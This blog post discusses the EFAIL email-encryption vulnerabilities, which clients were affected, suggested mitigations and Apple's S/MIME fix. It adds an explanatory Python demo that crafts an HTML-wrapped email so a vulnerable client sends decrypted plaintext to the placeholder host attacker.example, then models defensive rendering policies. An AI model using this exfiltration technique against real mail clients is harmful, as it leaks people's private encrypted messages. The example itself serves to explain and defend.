Fuller details have now been published about the EFAIL vulnerabilities in PGP and S/MIME email encryption, at the authors’ dedicated website.
They claim that the S/MIME encryption provided by Apple Mail, MailMate, Airmail and Apple’s Mail on iOS, together with Microsoft Outlook and Thunderbird, has been vulnerable even without any PGP software installed. Additionally, the combinations of Apple Mail or Airmail with GPGTools, and Thunderbird with Enigmail, have also been vulnerable. Apple’s Mail, whether running on macOS or iOS, has also been vulnerable to direct exfiltration attacks which require no user interaction.
If you use S/MIME or PGP encryption in any of those combinations, then you are most probably affected, and would be well advised to re-assess your risks.
As to mitigation strategies, the authors consider that “the best way to prevent EFAIL attacks is to only decrypt S/MIME or PGP emails in a separate application outside of your email client.” I don’t know how feasible that would be using, for example, Apple’s Mail app.
Regarding the strategy of disabling HTML rendering, they state “disabling the presentation of incoming HTML emails in your email client will close the most prominent way of attacking EFAIL”, but that does not solve all the problems. In the case of Apple’s Mail, it would appear to still leave encrypted messages vulnerable: “Apple Mail, iOS Mail and Mozilla Thunderbird had even more severe implementation flaws allowing direct exfiltration of the plaintext that is technically very easy to execute.”
Apple was informed of these vulnerabilities on 15 Nov 2017 and 10 Feb 2018. It appears that macOS High Sierra 10.13.4 does address direct exfiltration of S/MIME email, with the following fix now reported in its security release notes:
Available for: macOS High Sierra 10.13.3
Impact: An attacker in a privileged network position may be able to exfiltrate the contents of S/MIME-encrypted e-mail
Description: An issue existed in the handling of S/MIME HTML e-mail. This issue was addressed by not loading remote resources on S/MIME encrypted messages by default if the message has an invalid or missing S/MIME signature.
CVE-2018-4111: Damian Poddebniak of Münster University of Applied Sciences, Christian Dresen of Münster University of Applied Sciences, Jens Müller of Ruhr University Bochum, Fabian Ising of Münster University of Applied Sciences, Sebastian Schinzel of Münster University of Applied Sciences, Simon Friedberger of KU Leuven, Juraj Somorovsky of Ruhr University Bochum, Jörg Schwenk of Ruhr University Bochum
Entry updated April 13, 2018
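To make “direct exfiltration” and Apple’s fix concrete, here is an added Python example written for this post; it is not code from the EFAIL authors, from Apple, or from any mail client. It follows the EFAIL authors’ published description of the attack: the attacker wraps the encrypted part between two HTML parts containing an unclosed `<img src="` tag, so a client which renders all body parts as one HTML document ends up sending the decrypted text to the attacker’s server as part of a URL. It then models the policy in Apple’s release note (no remote loads for an S/MIME-encrypted message unless its signature is valid) and, as my own suggestion rather than anything from the post or the note, a stricter per-part rendering policy. The host name, the message contents, and the base64 stand-in for S/MIME decryption are all constructed for the example.

```python
import base64
import re
from email import message_from_string
from urllib.parse import quote

# Constructed sample, not a captured message: a multipart/mixed mail whose first
# and last parts are attacker-supplied HTML and whose middle part stands in for
# the S/MIME-encrypted body. The host name is hypothetical.
ATTACKER_HOST = "http://attacker.example/"
SECRET = "Secret plaintext: meet at 9"

# The "ciphertext" is plain base64 so the example runs offline; a real message
# carries CMS enveloped data here and fake_decrypt() would be the S/MIME decryptor.
SAMPLE_MAIL = """\
From: sender@example.com
To: victim@example.com
Subject: quarterly figures
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/html

<img src="{host}
--BOUNDARY
Content-Type: application/pkcs7-mime; smime-type=enveloped-data

{ciphertext}
--BOUNDARY
Content-Type: text/html

">
--BOUNDARY--
""".format(host=ATTACKER_HOST,
           ciphertext=base64.b64encode(SECRET.encode()).decode())


def is_encrypted(part):
    return part.get_content_type() == "application/pkcs7-mime"


def fake_decrypt(part):
    """Stand-in for the S/MIME decryptor: the sample 'ciphertext' is just base64."""
    return base64.b64decode(part.get_payload()).decode()


def part_as_html(part):
    """What a client feeds its HTML renderer for one body part."""
    if is_encrypted(part):
        return fake_decrypt(part)      # decrypted plaintext, inserted verbatim
    return part.get_payload()


def remote_resources(html):
    """URLs an HTML renderer would request for <img src="..."> in one document.
    Tabs and newlines inside the attribute are dropped, as URL parsers do, and the
    remainder is percent-encoded, giving the request the attacker's server sees."""
    urls = re.findall(r'<img\s+src="([^"]*)"', html, flags=re.IGNORECASE)
    return [quote(re.sub(r"[\t\r\n]", "", u), safe="/:") for u in urls]


def naive_remote_loads(raw_mail):
    """Vulnerable behaviour: every body part is concatenated into one HTML document,
    so the open <img src=" in part 1 swallows the decrypted part 2 and is closed by
    the quote in part 3. The returned URL carries the plaintext."""
    msg = message_from_string(raw_mail)
    html = "".join(part_as_html(p) for p in msg.get_payload())
    return remote_resources(html)


def signature_gated_remote_loads(raw_mail, signature_valid):
    """Policy described in Apple's CVE-2018-4111 note: for a message containing
    S/MIME-encrypted content, load no remote resources unless the S/MIME
    signature is present and valid. signature_valid stands in for that check."""
    msg = message_from_string(raw_mail)
    if any(is_encrypted(p) for p in msg.get_payload()) and not signature_valid:
        return []
    return naive_remote_loads(raw_mail)


def per_part_remote_loads(raw_mail):
    """Stricter design (my suggestion, not from the post or Apple's note): render
    each MIME part as its own document, so markup cannot span the encrypted part."""
    msg = message_from_string(raw_mail)
    urls = []
    for p in msg.get_payload():
        urls.extend(remote_resources(part_as_html(p)))
    return urls


if __name__ == "__main__":
    print("naive client requests:    ", naive_remote_loads(SAMPLE_MAIL))
    print("signature gate, unsigned: ", signature_gated_remote_loads(SAMPLE_MAIL, False))
    print("per-part rendering:       ", per_part_remote_loads(SAMPLE_MAIL))
```

Run stand-alone, the naive client requests `http://attacker.example/Secret%20plaintext:%20meet%20at%209`, which is the leak; the signature gate and the per-part policy request nothing. Note that the gate is only as good as the signature check behind it: a message with no signature must be treated the same as one whose signature fails, and a client which simply does not render HTML (the EFAIL authors’ own suggestion) removes this channel altogether.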
As of 0600 UTC on 15 May 2018, I cannot find any corresponding fix for iOS.
If you are affected by these vulnerabilities, then you will clearly need to make your own assessment of your risks and best mitigation strategy. However, it does appear that Apple has responded to the most severe bug in macOS Mail, and has at least mitigated the risk of using S/MIME in High Sierra’s Mail app. The situation with iOS Mail, and with macOS apps which use PGP encryption, seems less clear at present.